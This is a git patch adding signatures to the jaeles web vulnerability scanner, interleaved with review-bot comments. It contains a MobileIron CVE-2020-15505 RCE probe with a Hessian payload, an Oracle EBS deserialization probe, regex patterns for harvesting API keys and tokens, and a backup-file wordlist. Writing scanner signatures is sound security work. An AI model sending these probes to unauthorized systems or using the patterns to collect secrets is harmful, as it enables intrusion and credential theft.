From 4c79945bac422d3600c2e644fd0434ad39632118 Mon Sep 17 00:00:00 2001
From: j3ssie
Date: Wed, 23 Sep 2020 00:05:35 +0700
Subject: [PATCH] Update some signatures
---
 .github/FUNDING.yml | 12 ++
 README.md | 28 ++++
 common/oracle-ebs-desr copy.yaml | 29 ++++
 cves/mobileiron-rce-probe.yaml | 31 ++++
 mics/passive-on-success.yaml | 19 +++
 mics/passive-only.yaml | 20 +++
 mics/proxy-with-condition.yaml | 25 +++
 mics/reachable.yaml | 1 -
 passives/api-key.yaml | 262 +++++++++++++++++++++++++++++++
 passives/common.yaml | 27 ++++
 sensitive/svnleak.yaml | 3 +-
 sensitive/zip-backup-file.yaml | 105 +++++++++++++
 12 files changed, 560 insertions(+), 2 deletions(-)
 create mode 100644 .github/FUNDING.yml
 create mode 100644 common/oracle-ebs-desr copy.yaml
 create mode 100644 cves/mobileiron-rce-probe.yaml
 create mode 100644 mics/passive-on-success.yaml
 create mode 100644 mics/passive-only.yaml
 create mode 100644 mics/proxy-with-condition.yaml
 create mode 100644 passives/api-key.yaml
 create mode 100644 passives/common.yaml
 create mode 100644 sensitive/zip-backup-file.yaml
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 0000000..c22d61c
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+patreon: j3ssie
+open_collective: jaeles-project
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: [ 'https://paypal.me/j3ssiejjj' ]
diff --git a/README.md b/README.md
index e854954..aff73ae 100644
--- a/README.md
+++ b/README.md
@@ -23,6 +23,12 @@ ### Installation
+```
+jaeles config init
+```
+
+Or
+
 Try to clone signatures folder to somewhere like this ``` git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures /tmp/jaeles-signatures/
@@ -56,6 +62,28 @@ Examples: jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com/blog/' -p 'root=[[.URL]]' cat urls.txt | grep 'interesting' | jaeles scan -c 50 -s /tmp/jaeles-signatures/cves/sample.yaml -U list_of_urls.txt --proxy http://127.0.0.1:8080
+Config Command examples:
+ # Init default signatures
+ jaeles config init
+
+ # Update latest signatures
+ jaeles config update
+ jaeles config update --repo http://github.com/jaeles-project/another-signatures --user admin --pass admin
+ jaeles config update --repo git@github.com/jaeles-project/another-signatures -K your_private_key
+
+ # Reload signatures from a standard signatures folder (contain passives + resources)
+ jaeles config reload --signDir ~/standard-signatures/
+
+ # Add custom signatures from folder
+ jaeles config add --signDir ~/custom-signatures/
+
+ # Clean old stuff
+ jaeles config clean
+
+ # More examples
+ jaeles config add --signDir /tmp/standard-signatures/
+ jaeles config cred --user sample --pass not123456
+
 ``` ***
diff --git a/common/oracle-ebs-desr copy.yaml b/common/oracle-ebs-desr copy.yaml
new file mode 100644
index 0000000..0f34947
--- /dev/null
+++ b/common/oracle-ebs-desr copy.yaml
@@ -0,0 +1,29 @@
+id: oracle-ebs-desr
+info:
+ name: Oracle EBS Deserialization
+ risk: High
+ confidence: Tentative
+
+params:
+ - root: "{{.BaseURL}}"
+ - data: "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"
+
+requests:
+ - method: POST
+ redirect: false
+ url: >-
+ {{.root}}/OA_HTML/iesRuntimeServlet
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ body: |
+ {{ .data | b64dec }}
+ detections:
+ - >-
+ StatusCode() == 200 && ResponseTime() > 9 && StringSearch("body", "java.lang")
+
+references:
+ - links:
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+ - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
+ - https://github.com/sahabrifki/erpscan/blob/master/javaSerDetect.py
\ No newline at end of file
diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-probe.yaml
new file mode 100644
index 0000000..aedb7b5
--- /dev/null
+++ b/cves/mobileiron-rce-probe.yaml
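Review bot: The file name `common/oracle-ebs-desr copy.yaml` — a " copy" suffix with a space — reads as an editor-made duplicate rather than a deliberate new signature, and it carries `id: oracle-ebs-desr`, so if the signature it was copied from still exists under the same id both will run and report the same finding twice per target; either drop the copy or give it a distinct id and a space-free file name. The detection `StatusCode() == 200 && ResponseTime() > 9 && StringSearch("body", "java.lang")` leans on a timing threshold and nothing in the file says why 9 seconds was chosen, so a slow but unaffected host can satisfy that clause; a comment above `detections:` such as `# timing-based: adjust the 9s threshold to the target's baseline latency` would help whoever has to tune it. The file also ends without a trailing newline.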
@@ -0,0 +1,31 @@
+id: mobileiron-rce-probe
+info:
+ name: Mobileiron RCE Probe CVE-2020-15505
+ risk: Potential
+
+params:
+ - root: '{{.BaseURL}}'
+ - desr: 'YwIASAAEdGVzdE0='
+
+variables:
+ - endpoint: |
+ /mifs/.;/services/LogService
+
+requests:
+ - method: POST
+ redirect: false
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ - Content-Type: x-application/hessian
+ - Referer: '{{.BaseURL}}'
+ body: |
+ {{ .desr | b64dec }}
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0
+
+references:
+ - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
+ - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
\ No newline at end of file
diff --git a/mics/passive-on-success.yaml b/mics/passive-on-success.yaml
new file mode 100644
index 0000000..ac3ca8f
--- /dev/null
+++ b/mics/passive-on-success.yaml
@@ -0,0 +1,19 @@
+id: passive-on-success
+info:
+ name: Passive on success HTTP
+
+params:
+ - root: '{{.Raw}}'
+ - me: 'GET'
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}
+ headers:
+ - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55'
+ # Only do passive check if response is 200
+ detections:
+ - >-
+ StatusCode() == 200 && ContentLength("body") > 100 && DoPassive()
+
diff --git a/mics/passive-only.yaml b/mics/passive-only.yaml
new file mode 100644
index 0000000..1a26a41
--- /dev/null
+++ b/mics/passive-only.yaml
@@ -0,0 +1,20 @@
+id: passive-only
+passive: true
+info:
+ name: Passive only
+
+params:
+ - root: '{{.Raw}}'
+ - me: 'GET'
+
+# Useful for use only passive mode
+requests:
+ - method: '{{.me}}'
+ url: >-
+ {{.root}}
+ headers:
+ - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55'
+ # No detections
+ # detections:
+ # - >-
+ # 1 == 2
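Review bot: The request sends `Content-Type: x-application/hessian` while the detection looks for `application/x-hessian` in the response; the two spellings differ and a later editor may "fix" one to match the other, so if the difference is deliberate a comment above `detections:` like `# the service replies with Content-Type: application/x-hessian, which is not the request's type` would protect it. `ContentLength('body')` uses single quotes where the other new signatures write `ContentLength("body")` (mics/passive-on-success.yaml); pick one form. `endpoint` is a YAML literal block (`|`), which keeps a trailing newline, so `{{.root}}{{.endpoint}}` ends in one unless jaeles trims variables — `- endpoint: '/mifs/.;/services/LogService'` sidesteps the question.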
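Review bot: `me: 'GET'` is declared under `params:` but the request hard-codes `method: GET`, so the parameter is dead and a user overriding it with `-p 'me=POST'` would see no effect; either reference it as `- method: '{{.me}}'`, which mics/passive-only.yaml in this same commit does, or remove it. The `# Only do passive check if response is 200` comment omits the second gate on the same line, `ContentLength("body") > 100`; `# Only run passives on a 200 whose body exceeds 100 bytes` describes the expression fully.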
diff --git a/mics/proxy-with-condition.yaml b/mics/proxy-with-condition.yaml
new file mode 100644
index 0000000..8b25f4a
--- /dev/null
+++ b/mics/proxy-with-condition.yaml
@@ -0,0 +1,25 @@
+id: proxy-with-condition
+single: true
+info:
+ name: Proxy with condition
+ risk: Info
+ confidence: Tentative
+
+# Used for
+requests:
+ - method: GET
+ redirect: true
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ url: >-
+ {{.Raw}}
+ conclusions:
+ - SetValue("match", StatusCode() == 200 && !RegexSearch("body", "(?i)(Oops!|Whoops!|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") && ContentLength('body') > 100)
+
+ # pass to proxy if pass condition
+ - conditions:
+ - ValueOf("match") == "true"
+ method: GET
+ proxy: 'http://127.0.0.1:8080'
+ url: >-
+ {{.Raw}}
\ No newline at end of file
diff --git a/mics/reachable.yaml b/mics/reachable.yaml
index 09e2a3a..a5a3463 100644
--- a/mics/reachable.yaml
+++ b/mics/reachable.yaml
@@ -1,4 +1,3 @@
-# info to search signature
 id: mics-01-05
 passive: true
 info:
diff --git a/passives/api-key.yaml b/passives/api-key.yaml
new file mode 100644
index 0000000..466269e
--- /dev/null
+++ b/passives/api-key.yaml
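Review bot: `proxy: 'http://127.0.0.1:8080'` is hard-coded in the second request, so anyone whose listener is elsewhere must edit the signature, and a run on a host with nothing on that port presumably just fails that request; declare it under a `params:` section as `- proxy: 'http://127.0.0.1:8080'` and reference it with `proxy: '{{.proxy}}'` so `-p` can override it. The `# Used for` comment is unfinished — complete it or delete it. The regex in the `SetValue` conclusion writes `\s` with a single backslash, whereas passives/api-key.yaml (api-key-37, api-key-38) writes `\\s` in the same RegexSearch position; depending on how the expression evaluator unescapes string literals only one of these yields the intended `\s`, so align them once the working form is confirmed.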
@@ -0,0 +1,262 @@
+name: "api key pattern"
+desc: "grep for api key pattern"
+risk: "High"
+level: 1
+rules:
+ - id: api-key-01
+ reason: "Artifactory"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)artifactory.{0,50}(\\\"|'|`)?[a-zA-Z0-9=]{112}(\\\"|'|`)?")
+
+ - id: api-key-02
+ reason: "Code Clima"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)codeclima.{0,50}(\\\"|'|`)?[0-9a-f]{64}(\\\"|'|`)?")
+
+ - id: api-key-03
+ reason: "Facebook Access Token"
+ detections:
+ - >-
+ RegexSearch("response", "EAACEdEose0cBA[0-9A-Za-z]+")
+
+ - id: api-key-04
+ reason: "Facebook Access Token Base64"
+ detections:
+ - >-
+ RegexSearch("response", "RUFBQ0VkRW9zZTBjQk[%a-zA-Z0-9+/]+={0,2}")
+
+ - id: api-key-05
+ reason: "Facebook Oauth"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)facebook[^/]{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?")
+
+ - id: api-key-06
+ reason: "Google (GCP) Service-account"
+ detections:
+ - >-
+ RegexSearch("response", "((\\\"|'|`)?type(\\\"|'|`)?\\\\s{0,50}(:|=>|=)\\\\s{0,50}(\\\"|'|`)?service_account(\\\"|'|`)?,?)")
+
+ - id: api-key-07
+ reason: "Google API Key"
+ detections:
+ - >-
+ RegexSearch("response", "AIza[0-9A-Za-z\\-_]{35}")
+
+ - id: api-key-08
+ reason: "Google API Key Base64"
+ detections:
+ - >-
+ RegexSearch("response", "QUl6Y[%a-zA-Z0-9+/]{47}")
+
+ - id: api-key-09
+ reason: "Google OAuth"
+ detections:
+ - >-
+ RegexSearch("response", "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com")
+
+ # - id: api-key-10
+ # reason: "Google Recaptcha key"
+ # detections:
+ # - >-
+ # RegexSearch("response", "6L[0-9A-Za-z-_]{38}")
+
+ - id: api-key-11
+ reason: "Google OAuth Access Token"
+ detections:
+ - >-
+ RegexSearch("response", "ya29\\.[0-9A-Za-z\\-_]+")
+
+ - id: api-key-12
+ reason: "Google Oauth"
+ detections:
+ - >-
+ RegexSearch("response", "((\\\"|'|`)?client_secret(\\\"|'|`)?\\\\s{0,50}(:|=>|=)\\\\s{0,50}(\\\"|'|`)?[a-zA-Z0-9-_]{24}(\\\"|'|`)?)")
+
+ - id: api-key-13
+ reason: "Heroku API Key"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)heroku.{0,50}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}")
+
+ - id: api-key-14
+ reason: "Hockeyapp"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)hockey.{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?")
+
+ - id: api-key-15
+ reason: "MailChimp API Key"
+ detections:
+ - >-
+ RegexSearch("response", "[0-9a-f]{32}-us[0-9]{1,2}")
+
+ - id: api-key-16
+ reason: "Mailgun API Key"
+ detections:
+ - >-
+ RegexSearch("response", "key-[0-9a-zA-Z]{32}")
+
+ - id: api-key-17
+ reason: "NuGet API Key"
+ detections:
+ - >-
+ RegexSearch("response", "oy2[a-z0-9]{43}")
+
+ - id: api-key-18
+ reason: "Outlook team"
+ detections:
+ - >-
+ RegexSearch("response", "https\\://outlook\\.office.com/webhook/[0-9a-f-]{36}\\@")
+
+ - id: api-key-19
+ reason: "PayPal Braintree Access Token"
+ detections:
+ - >-
+ RegexSearch("response", "access_token\\$(live|production)\\$[0-9a-z]{16}\\$[0-9a-f]{32}")
+
+ - id: api-key-20
+ reason: "Sauce"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)sauce.{0,50}(\\\"|'|`)?[0-9a-f-]{36}(\\\"|'|`)?")
+
+ - id: api-key-21
+ reason: "Slack Token"
+ detections:
+ - >-
+ RegexSearch("response", "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})")
+
+ - id: api-key-22
+ reason: "Slack Webhook"
+ detections:
+ - >-
+ RegexSearch("response", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}")
+
+ - id: api-key-23
+ reason: "Sonar"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)sonar.{0,50}(\\\"|'|`)?[0-9a-f]{40}(\\\"|'|`)?")
+
+ - id: api-key-24
+ reason: "Square Access Token"
+ detections:
+ - >-
+ RegexSearch("response", "sq0atp-[0-9A-Za-z\\-_]{22}")
+
+ - id: api-key-25
+ reason: "Square OAuth Secret"
+ detections:
+ - >-
+ RegexSearch("response", "sq0csp-[0-9A-Za-z\\-_]{43}")
+
+ - id: api-key-26
+ reason: "Stripe API Key"
+ detections:
+ - >-
+ RegexSearch("response", "sk_live_[0-9a-zA-Z]{24}")
+
+ - id: api-key-27
+ reason: "Stripe Restricted API Key"
+ detections:
+ - >-
+ RegexSearch("response", "rk_live_[0-9a-zA-Z]{24}")
+
+ - id: api-key-28
+ reason: "Picatic API Key"
+ detections:
+ - >-
+ RegexSearch("response", "sk_live_[0-9a-z]{32}")
+
+ - id: api-key-29
+ reason: "SendGrid API Key"
+ detections:
+ - >-
+ RegexSearch("response", "SG\\.[\\w_]{16,32}\\.[\\w_]{16,64}")
+
+ - id: api-key-30
+ reason: "LinkedIn Client ID"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)linkedin(.{0,20})?(?-i)['\"][0-9a-z]{12}['\"]")
+
+ - id: api-key-31
+ reason: "LinkedIn Secret Key"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]")
+
+ - id: api-key-32
+ reason: "Cloudinary Basic Auth"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)cloudinary:\/\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+")
+
+ - id: api-key-33
+ reason: "WP-Config"
+ detections:
+ - >-
+ RegexSearch("response", "define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?['|\"].{10,120}['|\"]")
+
+ - id: api-key-34
+ reason: "Surge"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)surge.{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?")
+
+ - id: api-key-35
+ reason: "Twilio API Key"
+ detections:
+ - >-
+ RegexSearch("response", "SK[0-9a-fA-F]{32}")
+
+ - id: api-key-36
+ reason: "Twitter Oauth"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)twitter[^/]{0,50}[0-9a-zA-Z]{35,44}")
+
+ - id: api-key-37
+ reason: "Password in URL"
+ detections:
+ - >-
+ RegexSearch("response", "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]")
+
+ - id: api-key-38
+ reason: "Tenable key"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)['\"]?[a-z-_]*(tenable|nessus)[a-z-_]*['\"]?\\s*[=:]\\s*['\"]?\\w{64}['\"]?\\s*,?\\s*$")
+
+ - id: api-key-39
+ reason: "Github Access Token"
+ detections:
+ - >-
+ RegexSearch("response", "(?i)github(.{0,20})?(?-i)['\"][0-9a-zA-Z]{35,40}['\"]")
+
+ - id: api-key-40
+ reason: "Github Access Token 2"
+ detections:
+ - >-
+ RegexSearch("response", "[a-zA-Z0-9_-]*:[a-zA-Z0-9_\\-]+@github\\.com*")
+
+ - id: api-key-41
+ reason: "S3 Bucket"
+ detections:
+ - >-
+ RegexSearch("response", "[a-z0-9.-]+\\.s3\\.amazonaws\\.com|[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com|[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)|//s3\\.amazonaws\\.com/[a-z0-9._-]+|//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+")
+
+ - id: api-key-42
+ reason: "Json Web Token"
+ detections:
+ - >-
+ RegexSearch("response", "ey[A-Za-z0-9_=-]+\\.ey[A-Za-z0-9_=-]+\\.?[A-Za-z0-9_.+/=-]*")
+
+ - id: api-key-43
+ reason: "Authorization Header"
+ detections:
+ - >-
+ RegexSearch("response", "^(Bearer|Basic) [a-zA-Z0-9_=-]+$")
diff --git a/passives/common.yaml b/passives/common.yaml
new file mode 100644
index 0000000..94b3d20
--- /dev/null
+++ b/passives/common.yaml
@@ -0,0 +1,27 @@
+name: "common pattern"
+desc: "grep for common interesting pattern"
+risk: "Medium"
+level: 1
+rules:
+ - id: directory-listing-01
+ reason: "Directory Listing"
+ detections:
+ - >-
+ StatusCode() < 300 && StatusCode() >= 500 && StringSearch("body", 'Index of /') && StringSearch("body", '>Last Modified<')
+ - id: sensitive-php-01
+ reason: "PHP Info"
+ detections:
+ - >-
+ StatusCode() < 300 && StatusCode() >= 500 && StringSearch("body", 'PHP Configuration') && StringSearch("body", 'phpinfo()')
+
+ - id: sensitive-debug-01
+ reason: "Debug Page"
+ detections:
+ - >-
+ StatusCode() < 300 && StatusCode() >= 500 && RegexSearch("body", "(Application-Trace|Routing Error|DEBUG\"? ?[=:] ?True|Caused by:|stack trace:|Microsoft .NET Framework|Traceback|[0-9]:in `|#!/us|WebApplicationException|java\\.lang\\.|phpinfo|swaggerUi|on line [0-9]|SQLSTATE)")
+
+ - id: sensitive-firebase-01
+ reason: "Firebase detected"
+ detections:
+ - >-
+ StatusCode() < 300 && StatusCode() >= 500 && RegexSearch("response", "firebaseio.com")
diff --git a/sensitive/svnleak.yaml b/sensitive/svnleak.yaml
index 2715383..340b170 100644
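Review bot: api-key-43 anchors `^(Bearer|Basic) [a-zA-Z0-9_=-]+$` with `^` and `$` but is matched against the whole `response`; if RegexSearch is backed by Go's regexp, which the rest of the syntax suggests, those anchors bind to the start and end of the entire text when `m` is not set, so the rule fires only when the response consists of nothing but a token. The trailing `\\s*,?\\s*$` in api-key-38 has the same problem. Use `(?m)^(Bearer|Basic) [a-zA-Z0-9_=-]+$` and widen api-key-38's flag group to `(?im)`, or drop the anchors. Separately, api-key-26 (`sk_live_[0-9a-zA-Z]{24}`) matches the first 24 characters of anything api-key-28 (`sk_live_[0-9a-z]{32}`) matches, so every Picatic hit is reported twice; a comment on api-key-28 noting the overlap, or a length boundary on api-key-26, would avoid the duplicate. The `['|\"]` classes in api-key-33 include a literal `|` and are merely untidy.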
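Review bot: Every rule in passives/common.yaml gates on `StatusCode() < 300 && StatusCode() >= 500`, which no status code satisfies, so directory-listing-01, sensitive-php-01, sensitive-debug-01 and sensitive-firebase-01 can never fire. The intent is presumably to skip redirects and client errors, i.e. `StatusCode() < 300 || StatusCode() >= 500`; if only successful pages were meant, `StatusCode() >= 200 && StatusCode() < 300` is the tighter form. Whichever is chosen, a comment above `rules:` such as `# status gate: ignore 3xx and 4xx responses` would spare the next reader from re-deriving the expression.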
--- a/sensitive/svnleak.yaml
+++ b/sensitive/svnleak.yaml
@@ -1,4 +1,5 @@
-id: svn-leak-01
+id: svn-leak
+donce: true
 info:
 name: SVN Leak Source
 risk: Medium
diff --git a/sensitive/zip-backup-file.yaml b/sensitive/zip-backup-file.yaml
new file mode 100644
index 0000000..951af0e
--- /dev/null
+++ b/sensitive/zip-backup-file.yaml
@@ -0,0 +1,105 @@ +id: sensitive-zip-file +donce: true +info: + name: Common ZIP Backup File + risk: Potential + confidence: Tentative + +params: + - root: "{{.BaseURL}}" + +origin: + method: GET + redirect: false + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + url: >- + {{.BaseURL}}/hopefully404get.zip + +variables: + - secret: | + .0.zip + .2.zip + .org.zip + .zip + 1.sql.zip + 1.zip + 2.zip + 2010.zip + 2011.zip + 2012.zip + 2013.zip + 2014.zip + 2015.zip + 2016.zip + 2017.zip + 2018.zip + 2019.zip + Library.zip + archive.zip + backup.sql.zip + backup.zip + backups.zip + classes.zip + clients.zip + cstartup.zip + dat.zip + data.sql.zip + data.zip + databack.zip + databackup.zip + databak.zip + db.sql.zip + db.zip + db_backup.sql.zip + db_backup.zip + dbadmin.sql.zip + dbadmin.zip + dbase.sql.zip + dbase.zip + dbdump.sql.zip + dbdump.zip + dump.sql.zip + dump.zip + eroticos.zip + forum.zip + home.sql.zip + home.zip + i.zip + images.zip + index.zip + joomla.zip + js.zip + library.zip + mysql.sql.zip + mysql.zip + oldsite.zip + photos.zip + qs.zip + site.sql.zip + sql.sql.zip + sql.zip + temp.sql.zip + test.zip + upload.sql.zip + users.sql.zip + users.zip + vb.zip + web.sql.zip + web.zip + wp.zip + ws.zip + www.sql.zip + www.zip + wwwroot.zip + +requests: + - method: GET + redirect: false + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + url: >- + {{.root}}/{{.secret}} + detections: + - >- + StatusCode() == 200 && !RegexSearch("response", "(?i)(Oops!|Whoops!|AutodiscoverService|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") && (RegexSearch("resHeaders", ".*Content-Type:.*octet-stream") || RegexSearch("resHeaders", "text/plain")) && (Math.abs(ContentLength() - OriginContentLength()) > 100) && !RegexSearch("body", "(?i)(\<\!doctype|\ 100